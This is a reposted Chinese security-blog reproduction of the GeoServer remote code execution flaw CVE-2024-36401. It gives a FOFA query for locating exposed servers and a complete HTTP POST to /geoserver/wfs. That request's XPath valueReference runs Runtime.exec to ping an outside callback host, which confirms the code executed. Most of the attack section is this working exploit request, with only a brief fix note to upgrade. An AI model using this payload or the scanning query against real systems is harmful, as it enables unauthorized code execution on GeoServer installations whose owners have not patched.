Geoserver远程代码执行漏洞(CVE-2024-36401) PoC

admin 2024年11月1日09:18:57评论37 views字数 1065阅读3分33秒阅读模式

 

0x00 免责声明
本文内容已进行多层信息处理以确保安全。请注意,使用本公众号提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。如需联系我们,请在公众号内点击“联系客服”按钮,感谢您的理解与合作。

0x01漏洞名称

Geoserver远程代码执行漏洞(CVE-2024-36401)
0x02漏洞介绍
任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

0x03影响范围

GeoServer

0x04 网络空间测绘查询

app="GeoServer"
0x05 漏洞复现
https://github.com/xinghesec/pocs/blob/main/Geoserver-XPath-RCE-CVE-2024-36401

POST /geoserver/wfs HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3
Connection: close
Content-Length: 365
Content-Type: application/xml
Accept-Encoding: gzip, deflate

<wfs:GetPropertyValue service='WFS' version='2.0.0'
  xmlns:topp='http://www.openplans.org/topp'
  xmlns:fes='http://www.opengis.net/fes/2.0'
  xmlns:wfs='http://www.opengis.net/wfs/2.0'>
    <wfs:Query typeNames='topp:states'/>
    <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'ping k7ujpoo2.eyes.sh')</wfs:valueReference>
</wfs:GetPropertyValue>

Geoserver远程代码执行漏洞(CVE-2024-36401) PoC

Geoserver远程代码执行漏洞(CVE-2024-36401) PoC

 

0x07修复建议

升级至最新版本

原文始发于微信公众号(网安探索队):Geoserver远程代码执行漏洞(CVE-2024-36401)【漏洞复现】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日09:18:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Geoserver远程代码执行漏洞(CVE-2024-36401) PoChttps://cn-sec.com/archives/3341659.html

发表评论

匿名网友 填写信息